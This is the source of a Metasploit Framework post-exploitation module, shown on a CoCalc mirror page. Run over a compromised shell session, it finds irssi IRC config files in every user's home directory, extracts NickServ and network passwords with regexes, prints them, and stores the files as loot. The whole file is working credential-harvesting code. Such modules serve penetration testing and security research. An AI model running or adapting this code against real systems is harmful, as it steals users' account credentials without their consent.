CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/gather/irssi_creds.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Unix

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Multi Gather IRSSI IRC Password(s)',

15
        'Description' => %q{

16
          This module grabs IRSSI IRC credentials.

17
        },

18
        'Author' => [

19
          'Jonathan Claudius <jclaudius[at]mozilla.com>',

20
        ],

21
        'Platform' => %w[bsd linux osx unix],

22
        'SessionTypes' => %w[shell],

23
        'License' => MSF_LICENSE

24
      )

25
    )

26
  end

27


28
  def run

29
    print_status('Finding ~/.irssi/config')

30
    paths = enum_user_directories.map { |d| d + '/.irssi/config' }

31
    paths = paths.select { |f| file?(f) }

32


33
    if paths.empty?

34
      print_error('No users found with a ~/.irssi/config file')

35
      return

36
    end

37


38
    download_passwords(paths)

39
  end

40


41
  # Example of what we're looking for in the config...

42
  #

43
  # ***Identify Password Example***

44
  # autosendcmd = "/msg nickserv identify example_password ;wait 2000";

45
  #

46
  # ***Network Password Example***

47
  #    password = "example_password";

48
  #

49
  def contains_passwords?(path)

50
    data = read_file(path)

51
    identify_passwords = data.scan(%r{/\^?msg nickserv identify ([^\s]+)})

52
    network_passwords = data.scan(/^?password = "([^\s]+)"/)

53


54
    passwords = identify_passwords.flatten + network_passwords.flatten

55


56
    if passwords.any?

57
      print_good("Found IRC password(s) of #{passwords.join(',')} in irssi config at #{path}")

58
      return true

59
    end

60


61
    false

62
  end

63


64
  def download_passwords(paths)

65
    print_status "Looting #{paths.count} files"

66


67
    paths.each do |path|

68
      path.chomp!

69
      next if ['.', '..'].include?(path)

70


71
      next unless contains_passwords?(path)

72


73
      loot_path = store_loot(

74
        'irssi config file',

75
        'text/plain',

76
        session,

77
        read_file(path),

78
        path,

79
        'IRC Password'

80
      )

81
      print_good("irssi config with passwords stored in #{loot_path}")

82
    end

83
  end

84
end

85


86